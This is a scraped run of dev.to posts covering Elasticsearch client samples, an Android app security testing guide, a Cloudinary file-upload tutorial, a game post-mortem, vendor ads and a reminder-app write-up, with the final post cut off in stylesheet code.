## Client-Specific Instructions and Samples
<a name="AHP8P"></a>
### Go Client
1. **Prerequisites:** Install Go 1.19.1 and set up your Go environment. [The Go Programming Language](https://golang.org/).
2. **Sample Code:**
```go
// In this example, a Go 1.19.1 client is used.
package main
import (
"log"
"github.com/elastic/go-elasticsearch/v7"
)
func main() {
cfg := elasticsearch.Config {
Addresses: []string{
"<YourEsHost>",
},
Username: "<UserName>",
Password: "<YourPassword>",
}
es, err := elasticsearch.NewClient(cfg)
if err != nil {
log.Fatalf("Error creating the client: %s", err)
}
res, err := es.Info()
if err != nil {
log.Fatalf("Error getting response: %s", err)
}
defer res.Body.Close()
log.Println(res)
}
```
<a name="yMRSF"></a>
### Java Client
1. **Prerequisites:** Use High Level REST Client 6.7 or compatible version.
2. **Sample Code:**
```java
import org.elasticsearch.client.RestClient;
import org.elasticsearch.client.RestHighLevelClient;
public class ElasticSearchJavaClient {
public static void main(String[] args) {
RestHighLevelClient client = new RestHighLevelClient(
RestClient.builder(
new HttpHost("<YourEsHost>", 9200, "http"))
.setDefaultCredentialsProvider(credentialsProvider));
System.out.println(client.info(RequestOptions.DEFAULT));
client.close();
}
}
```
<a name="u5owA"></a>
### PHP Client
1. **Note:** Use `SimpleConnectionPool` for better compatibility.
2. **Sample Code:**
```php
require 'vendor/autoload.php';
$hosts = [
[
'host' => '<YourEsHost>',
'port' => '9200',
'scheme' => 'http',
'user' => '<UserName>',
'pass' => '<YourPassword>',
]
];
$client = \Elasticsearch\ClientBuilder::create()
->setHosts($hosts)
->setConnectionPool('\Elasticsearch\ConnectionPool\SimpleConnectionPool', [])
->build();
$response = $client->info();
print_r($response);
```
<a name="rEKN1"></a>
### Python Client
1. **Sample Code:**
```python
from elasticsearch import Elasticsearch
es = Elasticsearch(
['<YourEsHost>'],
http_auth=('<UserName>', '<YourPassword>'),
scheme="https",
port=9200,
verify_certs=True
)
print(es.info())
```
<a name="sXQri"></a>
## Additional Configuration Steps
<a name="Z3xZH"></a>
### Enable Auto Indexing
Enable the Auto Indexing feature for the Elasticsearch cluster. For more information, refer to [Configure the YML file](https://www.alibabacloud.com/en/product/elasticsearch).
<a name="uyDNR"></a>
### Configure IP Whitelists
1. **Internal Access:** If your server is within the same VPC, use the internal endpoint and add the server's private IP to the private IP address whitelist.
2. **Public Access:** For servers on the Internet, enable Public Network Access and add the server's public IP to the public IP address whitelist.
<a name="GkNAV"></a>
## Conclusion
By implementing the steps and using the provided code snippets, you can effectively access and manage your [Alibaba Cloud Elasticsearch](https://www.alibabacloud.com/en/product/elasticsearch) cluster. Remember to keep your systems updated and secure to ensure optimal performance.
Start your journey with Elasticsearch on Alibaba Cloud with our tailored solutions and services.<br /> [Click here to embark on Your 30-Day Free Trial](https://c.tb.cn/F3.bTfFpS) | a_lucas |
1,917,963 | How to Do Android App Security Testing: A Guide for Developers and Testers | Introduction As a die-hard fan of Android phones, if your phone suddenly drops, would your... | 0 | 2024-07-10T01:57:57 | https://dev.to/wetest/how-to-do-android-app-security-testing-a-guide-for-developers-and-testers-3j8b | javascript, programming, devops, beginners | ## Introduction
As a die-hard fan of Android phones, if your phone suddenly drops, would your first thought be "Oh my god!" or that your money in Google Pay or Paypal is not safe? If the latest downloaded app not only pops up various boring ads but also unexpected notifications, would you think it might be a phishing attempt and immediately uninstall the app?
How can we ensure that our app provides a safe experience for users who have insufficient awareness of Android security vulnerabilities? What are the security vulnerabilities in the Android ecosystem? Where can we explore new Android security testing techniques? How can we streamline the security testing process?
## Common Android Security Vulnerabilities
Firstly, the open-source development advantage of the Android operating system also conceals inherent security issues in its development, such as the Android system's sandbox system (i.e., virtual machine). However, the underlying layer has one vulnerability after another, allowing malicious programs (or tools) to gain root access and break the sandbox's restrictions. Just like in the PC era, there is no absolutely secure PC operating system; in the mobile internet era, there is no absolutely secure mobile operating system either. The security risks of the Android open-source ecosystem are like blood-stained alarm bells, striking the hearts of every Android developer.
Secondly, the security risks in the Android APP/SDK development process are like unknown black holes. We never know where the endpoint of security confrontation is, who the attackers are, who the terminators are, and how to defend against them.
Finally, at the user level, what are some common and recognizable security behavior vulnerabilities?
Both Android Apps and SDKs have security vulnerabilities to some extent. Perhaps one day, your application might be affected by one of the above security vulnerabilities. Coincidentally, while testing an Android SDK recently, we discovered a security vulnerability related to Android application components. Based on this example, the methods, techniques, and processes for Android SDK security testing are summarised.
## Android APPs' Security Testing Examples
**Overview of Vulnerability Causes**
An optional component of an application (hereinafter referred to as the application) Android SDK has opened a random port locally to monitor whether the Java layer service is alive. However, when the Java layer communicates with the component, it does not strictly check the input parameters, resulting in the possibility of being filled with attack code and malicious attacks when calling the "system()" function of the Linux system.
The following screenshot shows that after the simulation port is attacked, the application component intent modifies the URL content during communication, and the Webview displays garbled code:

## Potential Security Risks of the Vulnerability
The four major application components of Android APPs: Activity, Receiver, Service, and Content Provider, as well as the security roles of application components communicating through intent for IPC, will not be discussed in detail here. Leveraging the component-related vulnerability in the above example, the following diagram shows the attack dimensions related to the terminal APP side:

Due to the local application environment of Android APP, the network socket is inherently lack of fine-grained authentication and authorization mechanism. Therefore, if the Android client is used as the server, the reverse code is used to search the local random port number of the application, and the attack is actively sent to the port, the following security hazards will lurk:
1. **Local command execution**: When the Package name of the embedded application is specified as the application itself and the Component name is specified as the activity of the application, any activity of the application can be started, including the protected non-exported activity, thus causing a security hazard. For example, a denial of service vulnerability can be found by starting several unexported activities one by one through HTTP requests.
2. **Command control to modify application permissions**: Pass in the intention to start Android application components through the open socket port, and then execute operations such as starting activity and sending broadcast with the permissions of the attacked application. Because the intents passed in through the socket cannot perform fine-grained checks on the identity and permissions of the sender, bypassing the permission protection provided by Android for application components, and can start the unexported and permission-protected application components, posing a security hazard
3. **Sensitive information disclosure, mobile phone control**: A local service opens the UDP port to listen, and after receiving a specific command word, it can return the sensitive information of the mobile phone. For example, Baidu mobile phone butler can remotely manage the cell phone's secretKey, and then unauthorized attackers can fully manage the cell phone through the network.
## Android Security Testing Execution
**Android Security Hardening Version Optimization**
1. Add checks for system commands and special character filtering in both the Native and Java layers.
2. Encrypt socket communication for JNI Watchdog daemon process.
3. Add feature verification for URLs, intents, and activities in local notification functions to prevent redirection to malicious links when clicking on notifications.
4. Change the storage location of Package name in the app's local storage.
5. Add online configuration functionality.
These are the important requirements for this security hardening optimization.
## Special Security Testing
If you follow conventional system testing or performance testing, you only need to perform forward testing based on the changing requirements. However, for security testing, ensuring the robustness of the SDK's security requires reverse special testing, simulating various security attack methods, and diverging test cases for the modified points.
## Android Regular Security Regression Testing
1. **Privacy data**: External storage security and internal storage security; check if user names, passwords, chat records, configuration information, and other private information are saved locally and encrypted; verify the integrity of the information before using it.
2. **Permission attacks**: Check the app's directory and ensure that its permissions do not allow other group members to read or write; check if system permissions are under attack.
3. **Android component permission protection**: Prevent app internal components from being arbitrarily called by third-party programs: prevent Activities from being called by third-party programs, prevent Activity hijacking; ensure Broadcast reception and transmission security, only receive broadcasts sent out by the app, and prevent third parties from receiving transmitted content; prevent maliciously starting or stopping services; check Content Provider operation permissions; if components need to be called externally, verify if signature restrictions have been applied to the caller.
4. **Upgrades**: Check the integrity and legality of the upgrade package to avoid hijacking.
5. **3rd-party libraries**: If third-party libraries are used, follow up on their updates and check their security.
6. **ROM security**: Use official ROMs or ROMs provided by authoritative teams to avoid the addition of implanted ads, Trojans, etc.
7. **Anti-cracking countermeasures**: Counteract decompilation, making it impossible to decompile using decompilation tools or obtain the correct disassembly code after decompilation; counteract static analysis by using code obfuscation and encryption; counteract dynamic debugging by adding code to detect debuggers and emulators; prevent recompilation by checking signatures and verifying the hash value of the compiled dex file.
After completing the security special testing and regular process testing, perform rolling regression testing for the app's existing features, compatibility between new and old versions, and compatibility with different Android operating system versions.
## Wrap-up
Compared to ordinary performance and system functionality test cases, security test cases require a more comprehensive understanding of the Android ecosystem, such as: covering user security appearance level, application system local and remote attack level, and operating system vulnerability level, with more focus on designing reverse attack thinking test cases.
If the starting point of development is security defense, the starting point of testing is the hacker attack mindset. Designing test cases for attack scenarios and implementing attack testing techniques determines the robustness of the SDK's security.
To ensure the highest level of security for your applications, consider utilizing WeTest Application Security Testing. This service provides a comprehensive evaluation of security issues in applications, timely detection of program vulnerabilities, and offers code repair examples to assist with vulnerability repairs.
Trust [WeTest](https://www.wetest.net/?utm_source=forum&utm_medium=dev) to safeguard your application against potential threats and maintain a secure user experience.
 | wetest |
1,917,964 | Good ways to teach software development? | Hello! Just a few weeks ago I started to organize myself to teach others about software development,... | 0 | 2024-07-10T02:00:49 | https://dev.to/tonyrome/good-ways-to-teach-software-development-55d0 | discuss, learning, teaching, education | Hello!
Just a few weeks ago I started to organize myself to teach others about software development, the basics, computational thinking, backend, frontend, some professional tips and other topics from scratch. For now I only have a general idea and roadmap about what and how to teach, but nowadays there are a lot of tools to create good classes both online and face to face, but I lack experience to create good classes, I have little experience and I have been teaching using a whiteboard and the personal computer showing lines and lines of code with some simple examples. In your opinion, what tools are great for making a class fun and capturing the student's attention? I would like to avoid boring him by showing only lines of code and not falling into the typical examples when someone starts coding.
I know some AI tools but I don't have enough experience to make a great class, so could you share some tips or tools to be able to teach and still make it a great experience? please.
I appreciate any tips, thanks! | tonyrome |
1,917,965 | Simplify File Uploads with @fluidjs/multer-cloudinary in Express.js | Simplify File Uploads with @fluidjs/multer-cloudinary in Express.js ... | 0 | 2024-07-10T02:02:02 | https://dev.to/imani_brown_1a7d9bc29dd27/simplify-file-uploads-with-fluidjsmulter-cloudinary-in-expressjs-1i1m | javascript, multer, fileupload | # Simplify File Uploads with @fluidjs/multer-cloudinary in Express.js
## Introduction
Handling file uploads can be a daunting task, but with `@fluidjs/multer-cloudinary`, the process becomes straightforward and manageable. In this article, we'll walk through setting up an Express.js application to upload files directly to Cloudinary with minimal configuration.
## Why Use @fluidjs/multer-cloudinary?
This package offers several benefits that make it an excellent choice for managing file uploads:
- **Simplified Integration**: Easy to set up and integrate with existing projects.
- **Streamlined Workflow**: Reduces the complexity of managing file uploads.
- **Customizable Options**: Allows customization to fit specific needs.
- **Type Safety**: Supports TypeScript for better code maintainability.
## Step 1: Setting Up Your Environment
First, let's install the necessary packages. Open your terminal and run the following command:
```bash
npm install @fluidjs/multer-cloudinary cloudinary express dotenv
```
Next, create a .env file in your project's root directory to store your Cloudinary credentials. Add the following lines to your .env file:
```.env
CLOUDINARY_CLOUD_NAME=your_cloud_name
CLOUDINARY_API_KEY=your_api_key
CLOUDINARY_API_SECRET=your_api_secret
```
## Step 2: Configuring Express and Cloudinary
Now, let's set up our Express server and configure Cloudinary. Create an index.js file and add the following code:
```js
const express = require('express');
const multer = require('multer');
const { CloudinaryStorage } = require('@fluidjs/multer-cloudinary');
const { v2: cloudinary } = require('cloudinary');
const dotenv = require('dotenv');
dotenv.config();
const app = express();
const port = process.env.PORT || 8080;
// Configure Cloudinary
cloudinary.config({
cloud_name: process.env.CLOUDINARY_CLOUD_NAME,
api_key: process.env.CLOUDINARY_API_KEY,
api_secret: process.env.CLOUDINARY_API_SECRET
});
// Configure CloudinaryStorage
const storage = new CloudinaryStorage({
cloudinary: cloudinary,
params: {
folder: 'uploads', // Optional: Folder for uploaded files in Cloudinary
allowed_formats: ['jpg', 'jpeg', 'png'], // Optional: Restrict allowed file types
transformation: [{ width: 500, height: 500, crop: 'limit' }] // Optional: Apply image transformations on upload
}
});
const upload = multer({ storage: storage });
// Example route for file upload
app.post('/upload', upload.single('file'), (req, res) => {
console.log('Uploaded file details:', req.file);
// Access uploaded file information (filename, path, etc.)
// Further processing or database storage (optional)
res.json({ success: true, file: req.file });
});
app.listen(port, () => {
console.log(`Server is running on http://localhost:${port}`);
});
```
#Step 3: Understanding the Code
Importing Modules and Configuring Environment
We start by importing the necessary modules, including express, multer, `@fluidjs/multer-cloudinary`, cloudinary, and dotenv. The dotenv package helps us load environment variables from our .env file.
Configuring Cloudinary
We configure Cloudinary with the credentials stored in our .env file. This ensures that our application can communicate with Cloudinary's API.
Setting Up CloudinaryStorage
We create a CloudinaryStorage instance, specifying various options:
Folder: Determines the folder in Cloudinary where uploaded files will be stored.
Allowed Formats: Restricts the types of files that can be uploaded.
Transformation: Applies transformations (like resizing) to the uploaded images.
Configuring Multer and Defining the Upload Route
We create a multer instance using our CloudinaryStorage configuration. Then, we define a POST route /upload to handle file uploads. When a file is uploaded, its details are logged to the console and returned in the response. You can add further processing or store details in a database as needed.
Conclusion
By using `@fluidjs/multer-cloudinary`, you can simplify the process of uploading files to Cloudinary from an Express.js application. This setup is easy to implement and offers flexibility for handling various file upload scenarios.
Feel free to explore Cloudinary's documentation for more options on image transformations and the multer documentation for advanced file upload configurations. Happy coding!
---
For more community support and discussions, join our [Discord server 🎮](https://discord.gg/hUG9b85MJb).
You can find the npm package [@fluidjs/multer-cloudinary 📦](https://www.npmjs.com/package/@fluidjs/multer-cloudinary) on npm.
| imani_brown_1a7d9bc29dd27 |
1,917,967 | Tier 1 Support | We are USA based Multi-lingual Technical Support Experts. They provide Tier 1, 2 & 3 Support,... | 0 | 2024-07-10T02:11:53 | https://dev.to/peaceysystems/tier-1-support-21lm | We are USA based Multi-lingual Technical Support Experts. They provide Tier 1, 2 & 3 Support, Network Operations Support, Installation support since 2007.
| peaceysystems | |
1,917,968 | Post-mortem on the Test of Insanity | Howdy, today I'm here to discuss the development process of our latest game: THE TEST OF... | 0 | 2024-07-10T04:19:42 | https://dev.to/jacklehamster/post-mortem-on-the-test-of-insanity-14a6 | gamedev, godot, insanity, crazy | Howdy,
today I'm here to discuss the development process of our latest game:
## THE TEST OF INSANITY
This game is published under a new brand: [Big Nuts](https://bignutsgames.itch.io/), and developed using Godot
### A rocky start
Originally, KC and I were thinking of the kind of games we liked. Immediately, we found a common interest in JRPG (the likes of Final Fantasy, Phantasy Star...). So this was our obvious choice. We were going to build an epic JRPG, filled with wondrous world building and a very elaborate story.

We were very well aware that this was a very ambitious project, so we cautiously reduced the scope. This came down to:
- Just one village
- Simple turn base combat
- A limited number of playable characters
- An inventory and skill system that isn't too complex
Somehow, this seemed pretty doable to implement.
But soon, we came to the realization that the task could take a very long time, perhaps 6 months or even a year. I can't keep my interest that long on a single project!

### The devil is in the content
My misconception came from the fact that JRPG mechanics are somewhat simple to implement. The problem isn't the mechanics. The challenge is: How do you make an JRPG fun?
Before being engrossed into the story, the player's attention needs to be caught. Turns out, JRPG mechanics alone are not entertaining enough for players.
In most RPG games, the novelty comes from gorgeous art and a sophisticated world to explore.
When that's not enough, there are some complex but interesting battle mechanics.
On top of that, some games add mini-games, such as Blitz Ball, ChoCobo racing... My favorite JRPG, Phantasy Star, doesn't have all that, but it starts the game with both topdown view and dungeon crawling!

So this is where all the work comes from. Just the thought of it, made working on the game somewhat discouraging.
### Starting over

Thankfully, we were ok to let go of the work we had already put into the JRPG, and decided to pivot to a new idea. This time, we changed our goal. On top of making a fun game, we also added: Doable in a month!
We started brainstorming a few ideas and ranking them using those criteria.
### A game to rule them all
We came up with tons of funs ideas, but the one that we landed on was a variation of "The Impossible Quiz", where we could also mix quizzes and "mini-game" puzzles.

As it turns out, "mini-game" puzzles meant we could pretty much implement all the game ideas we had from the brainstorming session, so yeah, here we go underestimating the work again... But hey, at least now it was actually doable in a month!
### Getting started by setting the tone
I think we both had a pretty good idea of the kind of game we wanted. A bit silly, requiring some thinking out of the box and using your brain. To get started, I knew that we would need some kind of template, where we simply mark the level as complete and move to the next puzzle. That could be the base for all our other puzzle. So I just made a button that you could press to move to the next level.
Somehow, I felt like this was a good opportunity to set the tone for the game. So a bit as a joke, I made the button move every time you try to press it, such that you can never pass the level. Well the best part is that you could solve that level, if you put some thoughts into it.

That's right, that's our first level in "The Test of Insanity". Just in case you were wondering, our first level isn't trolling you. There's an actual solution to solve it without skipping.
### Smooth sailing

We were both working on the game, and things went very smoothly. I recently chatted with a friend about working on this game, and he asked about our process for code review. That's when I realized: we don't have any of that! Me and KC were able to work independently on our own levels, without having to scrutinize each other's code.
Should we do that? Isn't there a reason why software engineers generally perform code reviews?
Well, maybe. But if you think carefully about it, there are also reasons why some people enjoy coding for their side hustle, while dreading doing the exact same thing in a big company. It's liberating to work the way you like without being judged. I think one of the big lesson here, is that you don't always need to apply your "good" work practice to your hobby project. Make up your own rules!
At the end, our project has inconsistent coding style, two different art style, and we're perfectly fine with that!
### The challenges to come

As you all know, releasing the game isn't the end of the story. There's still a lot of work left to spread the word around and make our game popular.
We're pretty satisfied with it, and so far, play-testers seem to have fun solving the puzzles, trying to not go insane. So why not give it a try?
**We welcome you to try our game using the links below. Be sure to wishlist it on Steam so you get notified about juicy sales!**
{% twitter 1810818717049114923 %}
### Link to demo
Newgrounds: https://www.newgrounds.com/portal/view/938341
Itch.io: https://bignutsgames.itch.io/the-test-of-insanity
{% embed https://www.youtube.com/watch?v=VIkVK9_I164 %}
| jacklehamster |
1,917,970 | ANTlabs SG Express 5100 | BOOK A DEMO https://calendly.com/richard-720/30min Start small with this full-featured gateway for... | 0 | 2024-07-10T02:14:35 | https://dev.to/peaceysystems/antlabs-sg-express-5100-84m | BOOK A DEMO https://calendly.com/richard-720/30min
Start small with this full-featured gateway for quality Hotel WiFi, and pick only the features you need for your network.
An all-in-one Service Management Platform, the ANTlabs SG Express 5100 is ideal for smaller (100-150 room) properties such as boutique hotels, hostels, healthcare facilities and many more.
| peaceysystems | |
1,917,971 | ANTlabs SG Express 5200 | BOOK A DEMO https://calendly.com/richard-720/30min A better all-in-one Service Management Platform to... | 0 | 2024-07-10T02:15:07 | https://dev.to/peaceysystems/antlabs-sg-express-5200-38a5 | BOOK A DEMO https://calendly.com/richard-720/30min
A better all-in-one Service Management Platform to monetize existing Internet services, maximize limited bandwidth, and improve user experience
Designed for the hospitality sector, the ANTlabs SG Express 5200 meets the High Speed Internet Access (HSIA) needs of guest networks such as hotels, waiting rooms, business centers and F&B, while allowing hoteliers to roll out free HSIA WiFi that pays for itself.
| peaceysystems | |
1,917,972 | MAX232 IC:Features,Applications and Types | The MAX232 integrated circuit (IC) was engineered by Maxim Integrated Products and functions as a... | 0 | 2024-07-10T02:16:14 | https://dev.to/candice88771483/max232-icfeaturesapplications-and-types-2ln0 | programming | The MAX232 integrated circuit (IC) was engineered by Maxim Integrated Products and functions as a voltage logic converter, transforming TTL logic levels into TIA or EIA-232-F levels. It serves as a crucial intermediary for communication between PCs and microcontrollers. This IC finds application in various fields including terminals, battery-operated systems, computers, modems, and more.
What is the MAX232 IC?
The MAX232 IC is extensively utilized for facilitating serial communication between microcontrollers and PCs. Its primary role is to convert TTL/CMOS logic levels to RS232 levels during the serial communication process.
| candice88771483 |
1,917,973 | What integrated circuit chip is | What it is An integrated circuit chip design that integrates compound semiconductors with silicon... | 0 | 2024-07-10T02:17:17 | https://dev.to/candice88771483/what-integrated-circuit-chip-is-2pmo | programming |
What it is
An [integrated circuit chip](https://www.blikai.com/blog/components-parts/integrated-circuit-chip-types-applications-and-faq) design that integrates compound semiconductors with silicon complementary metal-oxide semiconductor (CMOS) technology, which is the basis for most of today’s integrated circuits.
Why it matters
Over 20 years ago, Eugene Fitzgerald of MIT developed strained silicon technology, overcoming the then-existing limits on the number of transistors on a computer chip. This innovation allowed Moore’s Law, which predicts the doubling of transistors on a chip every 18 months, to continue. However, silicon and compound semiconductor devices have now reached their natural limits and cannot independently provide the functionalities needed for further innovation. Fitzgerald, who is also the CEO and director of the Singapore MIT Alliance for Research and Technology (SMART), is developing an integrated circuit chip design that exceeds the natural capacity of silicon. By incorporating higher-performance compound semiconductors into integrated silicon circuit designs, it will be possible to create chips that drive advancements in product, system, and software design. These new chips will play a crucial role in the next generation of user interfaces for virtual and augmented reality, as well as 5G and 6G connectivity applications.
| candice88771483 |
1,917,983 | Building a Reminder App with Html, Css & javascript | Introduction I am excited to share the journey of building a Reminder app, a React Native... | 0 | 2024-07-10T02:46:15 | https://dev.to/bigelan/building-a-reminder-app-with-html-css-javascript-1bce |
Introduction
I am excited to share the journey of building a Reminder app, a React Native application developed as a portfolio project.The project kicked off on July 4, 2024, and had to be completed by July 11, 2024. Our goal was to create an App that manages different tasks effortlessly, Organize, prioritize, and track your to-dos seamlessly using this user-friendly web application.
Target Audience
This application is designed for anyone who wants a simple and user-friendly way to manage their to-do list. Just like keeping a note in your pocket, this app allows you to easily capture, organize, and track your reminders – all in one convenient place.
Personal Focus
My personal focus was on ensuring efficient state management and a clean, maintainable project architecture.
The Story Behind the Project
I am passionate about productivity and helping people stay organized. We often have discussions about the best ways to manage tasks and to-do lists. Growing up, I didn't have access to many resources for staying on top of my commitments. This project was a way for me to combine my interest in fostering organization with my technical skills to create a tool that empowers users to manage their tasks effectively.
One particular memory fuels my passion for this project. I vividly remember the satisfaction of completing a task and the sense of accomplishment that came with it. This project sparked a desire to create something that could bring that same sense of achievement to users as they check off their reminders and reach their goals.
Summary of Accomplishments
This user-friendly reminder app empowers you to stay on top of your tasks with features inspired by intuitive organization tools:
Task Categorization: Organize your reminders into categories for better focus and prioritization. (instead of Product Browsing)
Rich Task Details: Add detailed descriptions and due dates to each reminder for clarity and context. (instead of Product Details)
List Management: Effortlessly add, edit, and check off reminders to keep your list streamlined. (instead of Cart Management)
Completion Tracking: Gain a sense of accomplishment as you visualize completed reminders and track your progress towards goals.
Technologies Used
Frontend: Html, Css and Javascript
Architecture Diagram
Key Features
Product Browsing: Users can explore various categories.
The Biggest Hurdle: Keeping Reminders Up-to-Date
Challenge:
One of the biggest hurdles in developing this reminder app was ensuring that updates to reminders were reflected instantly across the entire application. This meant that regardless of which screen the user was on (adding a new reminder, viewing a specific reminder, etc.), any changes should be immediately visible.
Solution:
To achieve this seamless experience, I focused on implementing a robust state management system. This involved setting up mechanisms to track changes, update the central data source, and efficiently communicate those updates to all relevant parts of the app. Additionally, considerations were made for potential data persistence (optional, depending on app functionality) to ensure reminders remain even after the app is closed and reopened.
Conquering the Challenge: Real-Time Reminders
Success! After persistent effort and debugging, I achieved real-time updates for reminders across the app. This smooth experience is vital for user satisfaction and provided valuable insights into managing dynamic data.
Key Learnings:
State Management: The project solidified the importance of efficient state management for complex applications.
Real-Time Updates: I gained valuable experience in implementing real-time updates within the app itself.
User-Centric Design: The focus on seamless updates reinforces the importance of a user-friendly and intuitive interface.
Personal Growth:
Problem-Solving Prowess: Overcoming the real-time update challenge honed my problem-solving skills.
Future Vision:
Enhanced Security: Implementing a robust user authentication system for added security.
Intuitive Navigation: Integrating a search function to streamline reminder retrieval.
Delightful Design: Elevating the user experience through design improvements and animations.
About Me
I am a passionate software engineer with a keen interest in building user-centric applications. This project allowed me to combine my technical skills with my love for creating intuitive user experiences. You can find more about this project and my other works on my GitHub and LinkedIn profiles.
GitHub: Project Repository (https://github.com/elanjaja/Todo-List-App)
LinkedIn: My LinkedIn Profile (https://www.linkedin.com/in/elan-jaja/)
Deployed Project: Reminder App (https://todo-list-app-delta-gules.vercel.app/)
Thank you for reading about my journey in building this Reminder App. I look forward to applying these skills in future projects and continuing to grow as a software engineer.
| bigelan | |
1,917,977 | How to Build a Data Entry System (Quick & Easy Guide) | Build a Data Entry System In 3 Steps In this guide, we detail the steps necessary to construct and... | 0 | 2024-07-10T02:25:25 | https://five.co/blog/how-to-build-a-data-entry-system/ | database, datascience, mysql, tutorial | <!-- wp:heading -->
<h2 class="wp-block-heading">Build a Data Entry System In 3 Steps</h2>
<!-- /wp:heading -->
<!-- wp:paragraph -->
<p>In this guide, we detail the steps necessary to construct and deploy a data entry system using Five's rapid application development environment.</p>
<!-- /wp:paragraph -->
<!-- wp:essential-blocks/table-of-contents {"blockId":"eb-toc-1ryql","blockMeta":{"desktop":".eb-toc-1ryql.eb-toc-container { max-width:610px; background-color:var(\u002d\u002deb-global-background-color); padding:30px; border-radius:4px; transition:all 0.5s, border 0.5s, border-radius 0.5s, box-shadow 0.5s }.eb-toc-1ryql.eb-toc-container .eb-toc-title { text-align:center; cursor:default; color:rgba(255,255,255,1); background-color:rgba(69,136,216,1); font-size:22px; font-weight:normal }.eb-toc-1ryql.eb-toc-container .eb-toc-wrapper { background-color:rgba(241,235,218,1); text-align:left }.eb-toc-1ryql.eb-toc-container .eb-toc-wrapper li { color:rgba(0,21,36,1); font-size:14px; line-height:1.4em; font-weight:normal }.eb-toc-1ryql.eb-toc-container .eb-toc-wrapper li:hover,.eb-toc-1ryql.eb-toc-container .eb-toc-wrapper li.eb-toc-active \u003e a { color:var(\u002d\u002deb-global-link-color) }.eb-toc-1ryql.eb-toc-container .eb-toc-wrapper li a { color:inherit }.eb-toc-1ryql.eb-toc-container .eb-toc-wrapper li svg path { stroke:rgba(0,21,36,1) }.eb-toc-1ryql.eb-toc-container .eb-toc-wrapper li:hover svg path { stroke:var(\u002d\u002deb-global-link-color) }.eb-toc-1ryql.eb-toc-container .eb-toc-wrapper li a,.eb-toc-1ryql.eb-toc-container .eb-toc-wrapper li a:focus { text-decoration:none; background:none }.eb-toc-1ryql.eb-toc-container .eb-toc-wrapper li { padding-top:4px }.eb-toc-1ryql.eb-toc-container .eb-toc-wrapper .eb-toc__list li:not(:last-child) { padding-bottom:4px }.eb-toc-1ryql.eb-toc-container.style-1 .eb-toc__list-wrap \u003e .eb-toc__list li .eb-toc__list { background:#fff; border-radius:4px }","tab":"","mobile":"","editorDesktop":"\n\t\t \n\t\t \n\n\t\t .eb-toc-1ryql.eb-toc-container{\n\t\t\t max-width:610px;\n\n\t\t\t background-color:var(\u002d\u002deb-global-background-color);\n\n\t\t\t \n \n\n \n\t\t\t \n padding: 30px;\n\n \n\t\t\t \n \n \n \n\n \n \n border-radius: 4px;\n\n \n \n\n \n\n\n \n\t\t\t transition:all 0.5s, \n border 0.5s, border-radius 0.5s, box-shadow 0.5s\n ;\n\t\t }\n\n\t\t .eb-toc-1ryql.eb-toc-container:hover{\n\t\t\t \n \n \n\n\n \n\n \n \n \n\n \n \n\n \n\n \n\t\t }\n\n\t\t .eb-toc-1ryql.eb-toc-container .eb-toc-title{\n\t\t\t text-align: center;\n\t\t\t cursor:default;\n\t\t\t color: rgba(255,255,255,1);\n\t\t\t background-color:rgba(69,136,216,1);\n\t\t\t \n\t\t\t \n \n\n \n\t\t\t \n \n font-size: 22px;\n \n font-weight: normal;\n \n \n \n \n \n\n\t\t }\n\n\t\t .eb-toc-1ryql.eb-toc-container .eb-toc-wrapper{\n\t\t\t background-color:rgba(241,235,218,1);\n\t\t\t text-align: left;\n\t\t\t \n \n\n \n\t\t }\n\n\t\t .eb-toc-1ryql.eb-toc-container .eb-toc-wrapper ul,\n\t\t .eb-toc-1ryql.eb-toc-container .eb-toc-wrapper ol\n\t\t {\n\t\t\t \n\t\t\t \n\t\t }\n\n\t\t .eb-toc-1ryql.eb-toc-container .eb-toc-wrapper li {\n\t\t\t color:rgba(0,21,36,1);\n\t\t\t \n \n font-size: 14px;\n line-height: 1.4em;\n font-weight: normal;\n \n \n \n \n \n\t\t }\n\n\t\t .eb-toc-1ryql.eb-toc-container .eb-toc-wrapper li:hover,\n .eb-toc-1ryql.eb-toc-container .eb-toc-wrapper li.eb-toc-active \u003e a{\n\t\t\t color:var(\u002d\u002deb-global-link-color);\n\t\t }\n\n\t\t .eb-toc-1ryql.eb-toc-container .eb-toc-wrapper li a {\n\t\t\t color:inherit;\n\t\t }\n\n .eb-toc-1ryql.eb-toc-container .eb-toc-wrapper li svg path{\n stroke:rgba(0,21,36,1);\n }\n .eb-toc-1ryql.eb-toc-container .eb-toc-wrapper li:hover svg path{\n stroke:var(\u002d\u002deb-global-link-color);\n }\n\n\n\t\t .eb-toc-1ryql.eb-toc-container .eb-toc-wrapper li a,\n\t\t .eb-toc-1ryql.eb-toc-container .eb-toc-wrapper li a:focus{\n\t\t\t text-decoration:none;\n\t\t\t background:none;\n\t\t }\n\n\t\t \n\n .eb-toc-1ryql.eb-toc-container .eb-toc-wrapper li {\n padding-top: 4px;\n }\n\n .eb-toc-1ryql.eb-toc-container .eb-toc-wrapper .eb-toc__list li:not(:last-child) {\n padding-bottom: 4px;\n }\n\n \n .eb-toc-1ryql.eb-toc-container.style-1 .eb-toc__list-wrap \u003e .eb-toc__list li .eb-toc__list{\n background: #fff;\n \n \n \n \n\n \n \n border-radius: 4px;\n\n \n \n\n \n\n\n \n }\n\n\n\t \n\n\n\t\t .eb-toc-1ryql.eb-toc-container .eb-toc-wrapper{\n\t\t\t display:block;\n\t\t }\n\t\t ","editorTab":"\n\t\t \n\t\t .eb-toc-1ryql.eb-toc-container{\n\t\t\t \n\n\t\t\t \n \n\n \n\t\t\t \n \n\n \n\t\t\t \n \n \n\n \n\n \n \n \n\n \n \n\n \n\t\t }\n\t\t .eb-toc-1ryql.eb-toc-container:hover{\n\t\t\t \n \n \n \n \n \n \n\n \n \n \n\t\t }\n\n\t\t .eb-toc-1ryql.eb-toc-container .eb-toc-title{\n\t\t\t \n \n\n \n\t\t\t \n \n \n \n \n\t\t }\n\n\t\t .eb-toc-1ryql.eb-toc-container .eb-toc-wrapper{\n\t\t\t \n \n\n \n\t\t }\n\n\t\t .eb-toc-1ryql.eb-toc-container .eb-toc-wrapper li{\n\t\t\t \n \n \n \n \n\t\t }\n\n .eb-toc-1ryql.eb-toc-container.style-1 .eb-toc__list-wrap \u003e .eb-toc__list li .eb-toc__list{\n \n \n \n\n \n\n \n \n \n\n \n \n\n \n }\n\n\t \n\t\t ","editorMobile":"\n\t\t \n\t\t .eb-toc-1ryql.eb-toc-container{\n\t\t\t \n\n\n\t\t\t \n \n\n \n\t\t\t \n \n\n \n\t\t\t \n \n \n\n \n\n \n \n \n\n \n \n \n\t\t }\n\n\t\t .eb-toc-1ryql.eb-toc-container:hover{\n\t\t\t \n \n \n\n \n \n \n \n\n \n \n\n \n\t\t }\n\n\t\t 